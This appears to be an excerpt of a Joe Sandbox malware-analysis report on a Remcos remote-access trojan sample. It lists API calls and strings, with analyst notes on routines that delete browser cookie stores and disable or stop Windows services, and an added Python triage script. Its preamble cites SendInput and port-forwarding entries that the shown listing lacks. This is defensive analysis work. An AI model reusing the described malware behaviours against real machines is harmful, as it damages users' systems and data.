• WriteFile.KERNEL32(?,00000000,00000000,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DD9D
• WriteFile.KERNEL32(?,0044A1E5,00000001,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DDD6
Note: C runtime text-mode write path (console code page lookup, wide-to-multibyte conversion, WriteFile), not sample-specific logic.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
• Instruction ID: 1191330dd9651e550a9c57302bd25a2e4a4b496a4be768e30e66c30c5805dab2
• Opcode Fuzzy Hash: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
• Instruction Fuzzy Hash: 8B51B170E00609AFCB10CFA8E881AEEBBB9FF1D300F14512AE555E7291D7749951CB69
APIs
  • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
  • Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 0040D074
  • Part of subcall function 0040D033: RegCloseKey.KERNEL32(00000000), ref: 0040D07F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000,?,?,00000000), ref: 00408457
• PathFileExistsA.SHLWAPI(?,?,?,00000000), ref: 00408464
Note: the subcall opens HKEY_CURRENT_USER (0x80000001) with KEY_READ (0x00020019) and queries a value; given the strings, that is the Cookies value under Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders. The caller expands it with ExpandEnvironmentStringsA into a MAX_PATH (0x104) buffer and tests it with PathFileExistsA before reporting "[IE cookies cleared!]" or "[IE cookies not found]".
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: 212d0c3c002ae2edef2713a16cc0edc5256dee1b3f4577f796eb300dcf838cc7
• Instruction ID: 48a5cd8e34f4168e4ceb4a97fd5a88dfb481768987e4111ae43b07c44258e77f
• Opcode Fuzzy Hash: 212d0c3c002ae2edef2713a16cc0edc5256dee1b3f4577f796eb300dcf838cc7
• Instruction Fuzzy Hash: 1021C370A0021596CB04FBB1CD5BDEE7728AF55309F80003FB942772C2EE7C5949C699
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ac892822ad79c21a418106d2abc791ff60adf2d6927d3eb98dd4cd0fe3a8f10
• Instruction ID: 3624dff07b2ed831ebec2a5ad87dd854ecd10989a5fe549f38fdbb033019db15
• Opcode Fuzzy Hash: 4ac892822ad79c21a418106d2abc791ff60adf2d6927d3eb98dd4cd0fe3a8f10
• Instruction Fuzzy Hash: 8B1127725041147BEB206FB69C0996F7A6CEBCA775F10066FF825D2291DA38C810866A
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040BD4B
• int.LIBCPMT ref: 0040BD5E
  • Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
  • Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F
• std::locale::_Getfacet.LIBCPMT ref: 0040BD67
• std::_Facet_Register.LIBCPMT ref: 0040BD9E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDA7
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040BDC5
• __Init_thread_footer.LIBCMT ref: 0040BE06
Note: MSVC STL locale facet lookup and registration (the use_facet pattern), not sample-specific logic.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
• String ID:
• API String ID: 2409581025-0
• Opcode ID: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
• Instruction ID: f9d61c3bcc2ce2a12a6fed84a452ab5d8f8c1208be56ff46f61e8ed68a895f59
• Opcode Fuzzy Hash: c5f783e14f87cefe116d90d775a74b105a54ea3f7e80080ef4d35d6868249059
• Instruction Fuzzy Hash: 6221A432A00624DBCB14EBA9E9429DE7768DF45324B60017BF501A73D2EFB99D018BDD
APIs
  • Part of subcall function 00442E52: _free.LIBCMT ref: 00442E7B
• _free.LIBCMT ref: 00443159
  • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
  • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
• _free.LIBCMT ref: 00443164
• _free.LIBCMT ref: 0044316F
• _free.LIBCMT ref: 004431C3
• _free.LIBCMT ref: 004431CE
• _free.LIBCMT ref: 004431D9
• _free.LIBCMT ref: 004431E4
Note: C runtime cleanup (a series of _free calls backed by RtlFreeHeap), not sample-specific logic.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
• Instruction ID: a09468fba7be4ed354c4ff5dcfaf30c25cb33cc25251885fb4c19c4112b9c667
• Opcode Fuzzy Hash: 14f12bd113228a0bc42e7f884a469555986834d255118da641fb1e654957abe0
• Instruction Fuzzy Hash: D3116031951704A6E520FBB2CD07FCB77DCAF04B04F804C2EB39A66053DBB9A5464754
APIs
• GetLastError.KERNEL32(?,?,00431C7F,0042EEF4), ref: 00431C96
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00431CA4
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00431CBD
• SetLastError.KERNEL32(00000000,?,00431C7F,0042EEF4), ref: 00431D0F
Note: vcruntime per-thread (fiber-local storage) bookkeeping that preserves the last-error value, not sample-specific logic.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
• Instruction ID: 1b5bb3bab03150c8a1469d7da8b67c39e9eff8abb396b2b9584377dc358b62c2
• Opcode Fuzzy Hash: 81d3ad3cf813b00a2e0cf9f8b814f9992bd51637a01967386a431731664930c9
• Instruction Fuzzy Hash: E801283230D2215EEB2557B6BC89A672B95EB4B779B20223FF610412F0FF595C02914D
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies,00000000), ref: 00407F8B
• GetLastError.KERNEL32 ref: 00407F95
Strings
• UserProfile, xrefs: 00407F5B
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00407F56
• [Chrome Cookies found, cleared!], xrefs: 00407FBB
• [Chrome Cookies not found], xrefs: 00407FAF
Note: the function builds %UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Cookies, calls DeleteFileA on it and reads GetLastError to choose between the two status strings. Only the Default profile is targeted, and DeleteFileA also fails when another process holds the file open without FILE_SHARE_DELETE (typically the case while Chrome is running), so a "not found" result does not prove the cookie store is absent.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
• Opcode ID: b78552d0cf51e5af76c49f789ec0e556899faebe5107a7965b2598eb8b80988b
• Instruction ID: 9b808550f0e4f9b834a21a45c6ecabfd6167029ebe00eae2a55e211491ffde40
• Opcode Fuzzy Hash: b78552d0cf51e5af76c49f789ec0e556899faebe5107a7965b2598eb8b80988b
• Instruction Fuzzy Hash: 0A01F231A90106AACA047B75CE1B8AE7B24A912704B50017FE902731D2FD795909C29F
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 0e532726b122eb18f907c7bceffc294a5a8d2e25735973ef8a975cd35c6bafd6
• Instruction ID: 03017b7e80f62d50ee97b9a70ef162e4b45f9fae610041ecd781f4744da9c5cc
• Opcode Fuzzy Hash: 0e532726b122eb18f907c7bceffc294a5a8d2e25735973ef8a975cd35c6bafd6
• Instruction Fuzzy Hash: 96514E72980205ABDB249B69CC42FAF77A9DF4C324F24121FF85596291DB3CDD20876E
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133A8
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00412AF7,00000000), ref: 004133BC
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 004133C9
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133FE
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413410
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,00412AF7,00000000), ref: 00413413
Note: OpenSCManagerW is called with dwDesiredAccess 0x2 (SC_MANAGER_CREATE_SERVICE) and OpenServiceW with 0x2 (SERVICE_CHANGE_CONFIG); the service name is supplied at run time and is not recoverable from this listing. ChangeServiceConfigW then sets dwStartType (third argument) to 4, SERVICE_DISABLED, which prevents the targeted service from starting.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
• Instruction ID: 5fec4a889dd1482bee852cd790d8d51d36b2b239aed0c5db9861f1eb3ade3fe9
• Opcode Fuzzy Hash: 3071766905a9aa70e8b84d46910c906af901398d300ed7046dcbbe556962e6e3
• Instruction Fuzzy Hash: FB0126315441197BD6115F295C4AEBB3A5CDB42372F00022AF925931C0CE699F4691AE
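The entries in this section (SendInput with MapVirtualKeyA, the port-forwarding command strings, the IE and Chrome cookie routines, and the ChangeServiceConfigW call) all share the same call-site line format, which makes them easy to triage mechanically. The script below is an added example, not part of the Joe Sandbox report or of the Remcos sample: it parses that format, decodes the constants that matter here (HKEY roots, service start types, the 32-bit sizeof(INPUT)) and flags the behaviours. SAMPLE is excerpted from this section's own lines; the rule set, the constant tables and every function name are this example's assumptions.

```python
"""Triage a Joe Sandbox per-function API/string listing (added example, not part of the
Joe Sandbox report or of the Remcos sample). Parses call-site lines such as
'SendInput.USER32(00000001,...), ref: 00412897' and flags the behaviours they reveal.
SAMPLE is excerpted from the listing above; rules and constant tables are assumptions."""
import re
from dataclasses import dataclass, field

# Call-site line: optional 'Part of subcall function <addr>: ', API.MODULE, optional (args), ref: <addr>
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]{8}: )?"
                    r"(?P<api>[A-Za-z0-9_:~@]+)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref: (?P<ref>[0-9A-Fa-f]{8})$")
XREF_RE = re.compile(r"^(?P<text>.+), xrefs: [0-9A-Fa-f]{8}$")   # '<string>, xrefs: <addr>'
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
SERVICE_START = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
                 3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
FORWARD_CMDS = {"StartForward", "StartReverse", "StopForward", "StopReverse"}

@dataclass
class Call:
    api: str
    args: list      # argument tokens exactly as printed: hex words, '?' or a literal string
    ref: str

@dataclass
class Func:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

    def has(self, api):
        return any(c.api == api for c in self.calls)

    def arg(self, api, i):
        """Integer value of argument i of the first call to api; None unless it is a hex word."""
        for c in self.calls:
            if c.api == api and i < len(c.args):
                return int(c.args[i], 16) if re.fullmatch(r"[0-9A-Fa-f]+", c.args[i]) else None
        return None

def parse_listing(text):
    """One Func per record; in this listing each record's call block opens with an 'APIs' line."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            cur = Func()
            funcs.append(cur)
        elif not line or cur is None:
            continue
        elif m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], args, m["ref"]))
        elif m := XREF_RE.match(line):
            cur.strings.append(m["text"])
        elif line.startswith("String ID:"):      # '$'-joined strings of the Similarity row
            cur.strings += [s for s in line[10:].strip().split("$") if s and s not in cur.strings]
    return funcs

def triage(fn):
    """Findings for one record (the rules mirror what this report section shows)."""
    out = []
    if fn.has("SendInput") and fn.has("MapVirtualKeyA"):
        size = " (cbSize 0x1C = sizeof(INPUT) in a 32-bit process)" if fn.arg("SendInput", 2) == 0x1C else ""
        out.append("synthesized keyboard input via SendInput" + size)
    if fn.has("DeleteFileA") and any("Cookies" in s for s in fn.strings):
        path = next((s for s in fn.strings if "Cookies" in s and "\\" in s), "?")
        out.append("deletes a browser cookie store: " + path)
    hive = fn.arg("RegOpenKeyExA", 0)
    if hive is not None and any("User Shell Folders" in s for s in fn.strings):
        out.append("resolves a per-user shell folder from " + HKEY.get(hive, hex(hive)))
    start = fn.arg("ChangeServiceConfigW", 2)   # dwStartType
    if start is not None:
        out.append(f"sets a service start type to {start} ({SERVICE_START.get(start, 'unknown')})")
    hits = FORWARD_CMDS & set(fn.strings)
    if hits:
        out.append("port-forwarding command strings: " + ", ".join(sorted(hits)))
    return out

SAMPLE = r"""
APIs
• SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000003,00000004), ref: 00412897
  • Part of subcall function 00412844: MapVirtualKeyA.USER32(00000000,00000000), ref: 0041284A
APIs
  • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies,00000000), ref: 00407F8B
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00407F56
APIs
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00412AF7,00000000), ref: 004133FE
APIs
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
"""

if __name__ == "__main__":
    for n, fn in enumerate(parse_listing(SAMPLE)):
        for finding in triage(fn):
            print(f"record {n}: {finding}")
```

Run it as-is to see one finding per sample record; to triage a full report, paste the "APIs"/"Strings"/"Similarity" blocks of the function table into SAMPLE (or read them from a file), since record boundaries are taken from the "APIs" heading and argument tokens are kept exactly as printed, with '?' treated as unknown.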
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID: h^C
• API String ID: 1036877536-1919427450
• Opcode ID: 065bfbd48569dd85fd5e6b052d5978790a7c5ec4dc6bcfed56da8f5f56f7e80a
• Instruction ID: fee652c8f8de97b311e1edd3a94b9fd3768e3e6ba78c6f1d0a7032b1fb29f99c
• Opcode Fuzzy Hash: 065bfbd48569dd85fd5e6b052d5978790a7c5ec4dc6bcfed56da8f5f56f7e80a
• Instruction Fuzzy Hash: 7FA14836D003869FEB11CE58C8817AFBBA5EF69314F2441BFD9959B341C23C8949C759
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040C03F
                                                                                              • int.LIBCPMT ref: 0040C052
                                                                                                • Part of subcall function 00409864: std::_Lockit::_Lockit.LIBCPMT ref: 00409875
                                                                                                • Part of subcall function 00409864: std::_Lockit::~_Lockit.LIBCPMT ref: 0040988F
                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040C05B
                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040C092
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C09B
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C0B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 2243866535-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                              • _free.LIBCMT ref: 0043C64B
                                                                                              • _free.LIBCMT ref: 0043C673
                                                                                              • SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C680
                                                                                              • SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                              • _abort.LIBCMT ref: 0043C692
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412D00,00000000), ref: 004132D9
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412D00,00000000), ref: 004132ED
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 004132FA
                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00412D00,00000000), ref: 00413309
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331B
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D00,00000000), ref: 0041331E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00412C85,00000000), ref: 00413340
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00412C85,00000000), ref: 00413354
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413361
                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00412C85,00000000), ref: 00413370
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413382
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412C85,00000000), ref: 00413385
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID:
                                                                                              • API String ID: 221034970-0
                                                                                              APIs
                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0040D2B6
                                                                                              • RegSetValueExW.ADVAPI32(?,pth_unenc,00000000,00000001,00000000,00000000,00467F30,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2E6
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040A737,?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040D2F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: 5.1.3 Light$pth_unenc
                                                                                              • API String ID: 1818849710-640356412
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040974E
                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040978D
                                                                                                • Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CF9C
                                                                                                • Part of subcall function 0042CF7D: _Yarn.LIBCPMT ref: 0042CFC0
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 004097A5
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004097B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 3706160523-1405518554
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002), ref: 00438A28
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00438A3B
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,004389B9,00000003,?,00438959,00000003,004619C0,0000000C,00438AB0,00000003,00000002,00000000), ref: 00438A5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00401C9F,00000001), ref: 00401F3D
                                                                                              • SetEvent.KERNEL32(?,?,00401C9F,00000001), ref: 00401F49
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00401C9F,00000001), ref: 00401F54
                                                                                              • CloseHandle.KERNEL32(?,?,00401C9F,00000001), ref: 00401F5D
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                              • String ID: KeepAlive | Disabled
                                                                                              • API String ID: 2993684571-305739064
                                                                                              APIs
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00413507
                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00413515
                                                                                              • Sleep.KERNEL32(00002710), ref: 0041351C
                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00413525
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                              • String ID: Alarm triggered
                                                                                              • API String ID: 614609389-2816303416
                                                                                              APIs
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • _free.LIBCMT ref: 0043A4D4
                                                                                              • _free.LIBCMT ref: 0043A4EB
                                                                                              • _free.LIBCMT ref: 0043A50A
                                                                                              • _free.LIBCMT ref: 0043A525
                                                                                              • _free.LIBCMT ref: 0043A53C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3033488037-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,00000000,?,00000001,?,?,00000001,?,00467C58), ref: 0044338A
• __alloca_probe_16.LIBCMT ref: 004433C2
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00443413
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00443425
• __freea.LIBCMT ref: 0044342E
  • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00441543
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00441566
